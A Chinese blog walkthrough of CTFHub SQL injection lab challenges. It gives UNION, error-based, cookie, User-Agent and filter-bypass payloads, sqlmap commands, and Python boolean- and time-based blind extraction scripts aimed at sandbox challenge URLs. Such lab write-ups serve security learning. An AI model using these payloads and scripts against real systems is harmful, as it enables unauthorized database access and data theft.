【原创】ctfhub技能树—web前置技能—SQL注入

整数型注入

[huayang]Flag&基本步骤—通用任何数字(整数)型注入

方法一:硬爆,手撸

1.检查是否存在注入

1 and 1=1 返回正确
1 and 1=2 返回错误

正确返回
错误无返回

2.猜出字段数

order by x(数字)

order by 语句用于根据指定的列对结果集进行排序

这里我们一个一个的试

1 正确
2 正确
3 没有

由此我们猜出有两列

3.然后就是爆数据库名

1 and 1=2 union select 1,database()

得到数据库名称sqli

4.爆表名

1 and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema=’sqli’

得到表名 news,flag

5.爆字段名

1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=’flag’

得到字段名flag

6.爆flag


1 and 1=2 union select 1,group_concat(flag) from sqli.flag

得到ctfhub{7f95c9e82c76993d6695e97631bf80b646c2fd5c}

这部分知识点一并放在sql注入详细讲解

方法二 脚本-sqlmap

注:sqlmap为python2下的代码

1.查库名

python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 --dbs

2.查表名

python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 -D sqli –tables

3.查字段

python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 -D sqli -T --columns

4.查数据

python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump

sqlmap用法及步骤

sqlmap -u [“url”] --dbs #获取数据库
sqlmap -u [“url”] --current-user #获取当前用户名称 :
sqlmap -u [“url”] --current-db #获取当前数据库名称
sqlmap -u [“url”] -D [‘数据库名’] --tables   #列出表名 :
sqlmap -u [“url”] -D [‘数据库名’] -T[‘表名’] --columns #列出字段
sqlmap -u [“url”] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump #获取字段内容
sqlmap其他知识点会在sqlmap实战中仔细讲解

字符型注入

Flag

1.查数据库

2.查表名

112' union select group_concat(table_name),2 from information_schema.tables where table_schema='sqli'#

3.查字段名

1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag

4.查字段内容

123' union select flag,2 from flag#

总体来说差别还是在于引号的闭合

SQL 报错注入

Flag

1.查库

1 Union select count(*),concat((select database()),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

2.查表

1 Union select count(*),concat((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

可以猜到这并不是我们想要得信息

继续

1 Union select count(*),concat((select table_name from information_schema.tables where table_schema='sqli' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

3.查字段

1 Union select count(*),concat((select column_name from information_schema.columns where table_name='flag' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

4.查字段信息

1 Union select count(*),concat((select flag from sqli.flag),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

布尔盲注

直接给脚本

import requests
urls = 'http://challenge-cbd41590d122d86c.sandbox.ctfhub.com:10080/?id='
true = 'query_success'
def database_name():
    name = ''
    for number in range(1,8):
        for letter in 'qwertyuioplkjhgfdsazxcvb':
            url = urls + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
            number, letter)
            response = requests.get(url)
            if true in response.text:
                name = name + letter
                print(name,'...')
                break
    print('\n>>>database_name=',name,'<<<\n')
database_name()
def table_name():
    list = []
    for number1 in range(3):
        name = ''
        for number2 in range(1,8):
            for letter in 'qwertyuioplkjhgfdsazxcvbnm':
                url = urls + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
                    number1, number2, letter)
                response = requests.get(url)
                if true in response.text:
                    name = name + letter
                    print(name,'...')
                    break
        list.append(name)
    print('\n>>>table_name=', list,'<<<\n')
table_name()
def column_name():
    list = []
    for number1 in range(3):
        name = ''
        for number2 in range(1,8):
            for letter in 'qwertyuioplkjhgfdsazxcvbnm':
                url = urls + 'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
                number1, number2, letter)
                response = requests.get(url)
                if true in response.text:
                    name = name + letter
                    print(name,'...')
                    break
        list.append(name)
    print('\n>>>column_name=', list,'<<<\n')
column_name()
def get_flag():
    name = ''
    for number1 in range(50):
        for number2 in range(48, 126):
            url = urls + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (
            number1, number2)
            response = requests.get(url)
            if true in response.text:
                name = name + chr(number2)
                print(name,'...')
                break
    print('\n>>>flag=', name,'<<<\n')
get_flag()

时间盲注

Flag

详细的方式放在专题说

直接上代码

import requests,time
urls = 'http://challenge-b8d41d0852a2709a.sandbox.ctfhub.com:10080/?id='
def database_name():
    naem = ''
    for number in range(8):
        for letter in 'qwertyuioplkjhgfdsazxcvbnm':
            url = urls + 'if(substr(database(),%d,1)="%s",sleep(1),1)' % (number,letter)
            current1_time = time.time()
            response = requests.get(url)
            current2_time = time.time()
            current = current2_time - current1_time
            if current > 1:
                name = name + letter
                print(name)
                break
    print(name)
database_name()
def table_name():
    array = []
    for number1 in range(4):
       name = ''
       for number2 in range(8):
           for letter in 'qwertyuioplkjhgfdsazxcvbnm':
               url = urls + 'if(substr((select table_name from information_schema.tables where table_schema="sqli" limit %d,1),%d,1) = "%s",sleep(1),1)' % (number1,number2,letter)
               current1_time = time.time()
               response = requests.get(url)
               current2_time = time.time()
               current = current2_time - current1_time
               if current > 1:
                   name = name + letter
                   print(name)
                   break
       array.append(name)
    print(array)
table_name()
def column_name():
    name = ''
    for number2 in range(8):
        for letter in 'qwertyuioplkjhgfdsazxcvbnm':
            url = urls + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema="sqli"),%d,1) = "%s",sleep(1),1)' % (number2,letter)
            current1_time = time.time()
            response = requests.get(url)
            current2_time = time.time()
            current = current2_time - current1_time
            if current > 1:
                name = name + letter
                print(name)
                break
    print(name)
column_name()
def flag():
    name = ''
    for number1 in range(1,50):
        for number2 in range(48,126):
            url = urls + 'if(substr((select flag from sqli.flag),%d,1) = "%s",sleep(1),1)' % (number1,chr(number2))
            current1_time = time.time()
            response = requests.get(url)
            current2_time = time.time()
            current = current2_time - current1_time
            if current >= 1:
                name = name + chr(number2)
                print(name)
                break
    print(name)
database_name()
table_name()
column_name()
flag()

记得改成小写

MySQL结构

Flag

暂时手工不是很会,直接sqlmap一梭子

需要注意的是flag在这个表里

另一个打出来只能看见这个信息

这是字段信息哦

Cookie注入

手法不变只不过是吧注入页面换成了抓包工具

Flag

手撸

我们先输入个1看看效果

嗯,我想大家应该会了

1.查库

1+and+1=2+union+select+database(),2#

2.查表

1+and+1=2+union+select+group_concat(table_name),2+from +information_schema.tables+where+table_schema='sqli'#

3.查字段

1+and+1=2+union+select+group_concat(column_name),2+from +information_schema.columns+where+table_name='sjezkujtwr'#

4.查字段信息

1+and+1=2+union+select+cinmtrnyyz,2+from+sqli.sjezkujtwr#

cookie注入使用脚本和前面的不一样这里说一下

脚本sqlmap

1.库名

python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1"  --dbs

2.表名

python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1" -D sqli --tables

经过上面那些,猜都知道flag在sjezkujtwr里

3.字段

python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1" -D sqli -T sjezkujtwr --columns

4.字段信息

python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1" -D sqli -T sjezkujtwr -C cinmtrnyyz --dump

UA注入

Flag

手撸

这个注入和前面的也一样只不过是换到了ua里

就这个意思

1.库

1 and 1=2 union select database(),2#

2.表

1 and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema='sqli'#

3.字段

1 and 1=2 union select group_concat(column_name),2 from
information_schema.columns where+table_name='vukfimjwtg'#

4.字段信息

1 and 1=2 union select lgbnyifysd,2  from sqli.vukfimjwtg#

python代码

待写。。。

过滤空格

Flag

手撸

整体来说也是万变不离其中加个注释又是一样

1.库

1/**/and/**/1=2/**/union/**/select/**/database(),2#

2.表

1/**/and/**/1=2/**/union/**/select/**/group_concat(table_name),2/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'

3.字段

1/**/and/**/1=2/**/union/**/select/**/group_concat(column_name),2/**/from/**/information_schema.columns/**/where/**/table_name='jdyrbbxovi'

4.字段信息

1/**/and/**/1=2/**/union/**/select/**/sfuqqyytbz,2/**/from/**/sqli.jdyrbbxovi

脚本——sqlmap

待写

Refer注入

Flag

手撸

代码和ua的都一样就不写了

1.表

2.字段

3.字段信息

完!

随后更加详细的分析都将会在sql注入(入门篇)里更加仔细的讲解

【原创 精华 超详细】SQL注入总结——(入门篇,ctf篇)

伸手党,白嫖党勿进!!!

[/huayang]

==>转载请注明来源哦<==

评论

  1. 华扬
    华扬 博主
    11月前
    2021-2-28 10:44:09

    康康

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇